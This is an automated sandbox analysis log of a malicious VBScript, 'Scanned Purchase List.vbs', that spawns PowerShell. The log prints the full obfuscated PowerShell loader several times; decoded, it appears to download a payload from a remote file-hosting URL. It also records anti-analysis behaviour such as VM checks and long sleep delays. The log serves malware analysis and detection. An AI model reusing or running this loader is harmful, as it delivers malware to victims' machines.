      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00datdxo.taw.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs"
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Scanned Purchase List.vbsVirustotal: Detection: 12%
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? 
Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? 
Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohIJump to behavior
      Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: .pdb_ source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32W source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.Core.pdb, source: powershell.exe, 00000001.00000002.3012431445.000001ADE7DC9000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("Powershell.exe", ""<#selvhrdendes Opdrager Hjremarginerne", "", "", "0");
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? 
Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BA052A7 pushad ; iretd 1_2_00007FFD9BA052B9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BA00973 push E95B65D0h; ret 1_2_00007FFD9BA009C9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BADC410 pushad ; retn 0000h 1_2_00007FFD9BADC5B1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAD78DD push edi; ret 1_2_00007FFD9BAD78DE
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BADC494 pushad ; retn 0000h 1_2_00007FFD9BADC5B1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAD7C72 push esp; ret 1_2_00007FFD9BAD7C74
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6280
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3497
      Source: C:\Windows\System32\wscript.exe TID: 7380 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep time: -2767011611056431s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: wscript.exe, 00000000.00000003.1708614080.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717547305.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1708336841.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1707930917.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719617454.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW5
      Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: wscript.exe, 00000000.00000002.1719782675.000001DC5EB96000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2-0000F81FEDEE}\InstanceEE}iskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume
      Source: wscript.exe, 00000000.00000002.1719282268.000001DC5CB2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718125576.000001DC5CB25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1708284459.000001DC5CB05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718434684.000001DC5CB26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0G
      Source: wscript.exe, 00000000.00000003.1718075633.000001DC5EB8A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \Registry\Machine\Software\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\InstanceEE}iskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume
      Source: wscript.exe, 00000000.00000003.1718684416.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_ServiceStoppedOKvmicguestinterfacevmicguestinterfaceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service InterfaceHyper-V Guest Service InterfaceWin32_ServiceWin32_ComputerSystemuser-PCvmicguestinterfaceLMEM@
      Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicvss
      Source: wscript.exe, 00000000.00000003.1708614080.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717547305.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1708336841.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1707930917.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719617454.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000001.00000002.3013440346.000001ADE7FC0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWho%SystemRoot%\system32\mswsock.dllikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohInceKorsCicoaftnser,sep$C,aB EmiPunl Asl s aU raNo@
      Source: wscript.exe, 00000000.00000002.1719491235.000001DC5EA77000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\Xe
      Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_ServiceStoppedOKvmicheartbeatvmicheartbeatUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicheartbeat
      Source: wscript.exe, 00000000.00000003.1718684416.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
